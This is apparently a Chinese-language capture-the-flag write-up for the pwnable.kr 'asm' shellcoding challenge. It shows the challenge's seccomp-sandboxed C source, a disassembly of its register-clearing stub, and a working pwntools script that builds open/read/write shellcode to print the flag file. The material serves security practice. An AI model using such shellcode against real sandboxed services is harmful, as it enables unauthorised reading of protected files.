pwnable之asm
问题描述
Welcome to shellcoding practice challenge. In this challenge, you can run your x64 shellcode under SECCOMP sandbox. Try to make shellcode that spits flag using open()/read()/write() systemcalls only. If this does not challenge you, you should play 'asg' challenge
asm.c
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp error\n"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp error\n"); exit(0); } seccomp_release(ctx); } char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.\n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n"); printf("If this does not challenge you. you should play 'asg' challenge :)\n"); char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }
分析
sh 可以写入 shellcode,stub 是对寄存器清零操作。
(ipython)
In [4]: print disasm('\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff')
   0:   48 31 c0    xor rax,rax
   3:   48 31 db    xor rbx,rbx
   6:   48 31 c9    xor rcx,rcx
   9:   48 31 d2    xor rdx,rdx
   c:   48 31 f6    xor rsi,rsi
   f:   48 31 ff    xor rdi,rdi
  12:   48 31 ed    xor rbp,rbp
  15:   4d 31 c0    xor r8,r8
  18:   4d 31 c9    xor r9,r9
  1b:   4d 31 d2    xor r10,r10
  1e:   4d 31 db    xor r11,r11
  21:   4d 31 e4    xor r12,r12
  24:   4d 31 ed    xor r13,r13
  27:   4d 31 f6    xor r14,r14
  2a:   4d 31 ff    xor r15,r15
在sandbox里只能调用open,read,write。
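from pwn import *

# Connect to the challenge instance over SSH and then to the local service
# port. The guest credentials are the ones published by the challenge itself.
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('0', 9026)

# shellcraft/asm must target x86-64 to match the binary.
context.arch = 'amd64'

# Path of the flag file inside the chroot, as given by the challenge.
FLAG_FILE = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

# The seccomp filter only lets open/read/write through, so the payload is
# exactly those three calls: push the path onto the stack, open it (flags 0 =
# O_RDONLY, rax receives the fd), read 0x80 bytes into the same stack buffer,
# then write that buffer to stdout.
shellcode = ''
shellcode += shellcraft.pushstr(FLAG_FILE)
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 0x80)
shellcode += shellcraft.write(1, 'rsp', 0x80)

p.sendline(asm(shellcode))
# Call form of print so the script runs under both Python 2 and Python 3
# (the original `print p.recvall()` statement is a syntax error on 3).
print(p.recvall())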